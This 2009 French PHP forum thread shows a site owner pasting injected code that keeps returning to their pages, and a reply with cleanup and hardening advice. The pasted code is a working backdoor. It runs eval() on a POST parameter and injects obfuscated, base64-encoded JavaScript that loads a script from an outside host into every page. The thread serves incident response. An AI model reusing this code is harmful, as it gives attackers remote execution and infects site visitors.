Accueil > Forum > > > > message d'erreur causé par un code virus ajouter automatiquement!!!
message d'erreur causé par un code virus ajouter automatiquement!!!
jeudi 26 mars 2009 à 12:12:24 |
message d'erreur causé par un code virus ajouter automatiquement!!!

AssistMR
|
bonjour, g trouvé un code de plus sur mes pages qui a été ajouter automatiquement, meme apres la supression du code il ya tjrs le meme message d'erreur car le code revient à chaque fois, voila le code ke g trouvé : <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzaXJXY3J0WWlwZUJGdGlyVyUyMFo1bnM2aXJjdFklM0R0WSUyRiUyRjlaNW40WjVuJTJFZUJGMjQ3aXJXJTJFMiUyRWVCRjFaNW45NVFzNSUyRlo1bmppcldxdWVpcldyeWlyVyUyRWppcldzUXM1JTNFNmklM0MlMkZzaXJXY3J0WWl0WXBRczV0JTNFJykucmVwbGFjZSgvdFl8UXM1fHZWNHxlQkZ8aXJXfDZpfFo1bi9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?phpmnt j'arrive tjrs pas à trouver la solution é mes sites sont tous bloquer!!! merci de m'envoyer la solution si vous avez rencontrer le meme probleme. bon courage!!
|
|
jeudi 26 mars 2009 à 19:50:33 |
Re : message d'erreur causé par un code virus ajouter automatiquement!!!

Flachy Joe
|
Vérifie TOUTES tes pages PHP, et tes bases SQL. Bloque l'accès à ton site pendant que tu le fait en mettant en place un htaccess (même pas de page d'explication, renvoi tout le monde vers le néant ou sur ce sujet par exemple) et en ayant changer tous tes mots de passes (FTP, zone admin, etc) Si tu ne trouve rien de particulier ou que le travail est trop gigantesque, restaure si possible une sauvegarde. Vérifie les protections des entrées utilisateurs en échappant les caractères spéciaux, (htmlspecialchars et mysql_real_escape_string). Tu devrait trouver des infos par là : [ Lien ]A noter que si tu es sur un serveur mutualisé c'est possible que ça ne vienne pas de ton site !  Flachy Joe  « Il vaut mieux mobiliser son intelligence sur des conneries que mobiliser sa connerie sur des choses intelligentes. » Les Shadoks
|
|
Cette discussion est classée dans : code, tmp, preg, ob, if
Répondre à ce message
Sujets en rapport avec ce message
preg_replace [ par Tomcube ]
Est-ce que quelqu'un pourrait me modifier cette ligne pour la faire accepter les retours à la ligne (\n), j'ai trop de mal avec les masques ! $text =
Métacaractères... [ par mfaraday ]
Salut...Est-ce que quelqu'un pourrait m'expliquer comment utiliser les métacaractères dans un profil de recherche pour la fonction preg_match par exem
Rand() avec valeur regex [ par mathieumg ]
Bonjour j'essaie de faire un tag [de]chiffre[/de] pour mon forum qui fera un chiffre au hasard entre 1 et le chiffre entre les tags, seulement le rand
preg_replace pour chaine de code php [ par JoJo738 ]
Aide pour un Preg_replace [ par audayls ]
Bonjour, Je souhaite "colorier" un contenu particulié dans une balise, mais jusqu'ici mais mes tentatives ont été nulles ... lol J'essaye de fai
Membre en ligne [ par dclick07 ]
Voici mon probleme. Je sais que dans le profil d'un membre ce code ci-dessous me permet de voir si un membre est en ligne mais lorsque j'utilise ce c
optimisation petit code de rien du tout [ par jphilippev ]
bonjour tt le mondeca faisait longtemps que je n'avais pas posé mes petites questions...la c'est juste pour optimiser mon code donc voilaje fait cela
Question templates [ par astuces_jeux ]
Bonjour,J'ai remarqué que l'utilisation de la class fasttemplate est compliquée. Alors je voulais savoir si on ne pouvait pas faire ça simple : foncti
Masque pour preg_match() ... Aidez-moi ! [ par LocalStone ]
Alors, j'expose le problème : J'ai 1 fichier texte qui contient des ligne du style : 0004 - Chu Chu Rocket (J)Donc le masque approprié pour sépare
if qui ne fonctionne pas correctement [ par winnie39 ]
Bonjour à tous,Voila je dois créer un site pour un stage, mais j' ai un problème de condition.Voila la page se compose d' une image et d' un texte, ma
Livres en rapport
|
Derniers Blogs
UNE JOLIE-HORLOGE ET PAS QU'UN PEU !UNE JOLIE-HORLOGE ET PAS QU'UN PEU ! par neodante
Pour les possesseurs d'iPhone, ça y est Bijin Tokei - qui se traduit littéralement en Français par " Jolie Horloge " - est arrivé et GRATUITEMENT s'il vous plaît ! Après la version Tokyo, Hokkaido, night club, racing, Gal, "pour les mademoiselles'", . voi...
Cliquez pour lire la suite de l'article par neodante TECHDAYS PARIS 2010 : CONNECTEZ VOS DONNéES à SHAREPOINT 2010 AVEC LES BUSINESS CONNECTIVITY SERVICESTECHDAYS PARIS 2010 : CONNECTEZ VOS DONNéES à SHAREPOINT 2010 AVEC LES BUSINESS CONNECTIVITY SERVICES par ROMELARD Fabrice
Animé par: Gaetan Bouveret et Julien Chomarat Business Connectivity Services (BCS) est dans SharePoint 2010 la version 2 de Business Data Catalog (BDC dans SharePoint 2007). Il s'agit de la solution permettant de visualiser des données provenan...
Cliquez pour lire la suite de l'article par ROMELARD Fabrice [DIVERS] SUIVRE VOS SéRIES PRéFéRéS SUR LA TOILE[DIVERS] SUIVRE VOS SéRIES PRéFéRéS SUR LA TOILE par orion
Comme de nombreux geek, je suis un grand amateur de série TV et je rate régulièrement des épisodes de mes séries préférés. Une solution s'offre à vous avec ce merveilleux site : Tv Gorge - www.tvgorge.com Moteur de recherche à l'appui, vous pouvez ...
Cliquez pour lire la suite de l'article par orion TECHDAYS PARIS 2010 : LA BI DANS SHAREPOINT 2010TECHDAYS PARIS 2010 : LA BI DANS SHAREPOINT 2010 par ROMELARD Fabrice
Animé par: Vincent Bellet et Baptiste Giraudier La BI dans SharePoint 2010, Les nouveaux services d'application dans SP2010 et SQL Server Reporting services 2008 R2. La BI dans SharePoint est généralisée pour tous afin de permettre à tous les coll...
Cliquez pour lire la suite de l'article par ROMELARD Fabrice
Logiciels
DB-MAIN (9.1.0)DB-MAIN (9.1.0)DB-MAIN is a data-modeling and data-architecture tool. It is designed to help developers and anal... Cliquez pour télécharger DB-MAIN Xilisoft DPG Convertisseur (5.1.37.0120)XILISOFT DPG CONVERTISSEUR (5.1.37.0120)Xilisoft DPG Convertisseur offre aux fans de Nintendo DS une bonne solution leur permettant de dé... Cliquez pour télécharger Xilisoft DPG Convertisseur GraphicsGale (2.01.01)GRAPHICSGALE (2.01.01)GraphicsGale est un logiciel de PixelArt avec de nombreuse fonctionnalités permettant de réalisé ... Cliquez pour télécharger GraphicsGale Architecte 3D (Platinum 2010)ARCHITECTE 3D (PLATINUM 2010)Architecte 3D Platinium vous permet de concevoir facilement les plans votre future maison, de l'é... Cliquez pour télécharger Architecte 3D TeamViewer 5 (TeamViewer 5)TEAMVIEWER 5 (TEAMVIEWER 5)Dépanner un ami,expliquer une manipulation devient un jeu d'enfant.
Prise en main d'un autre ord... Cliquez pour télécharger TeamViewer 5
|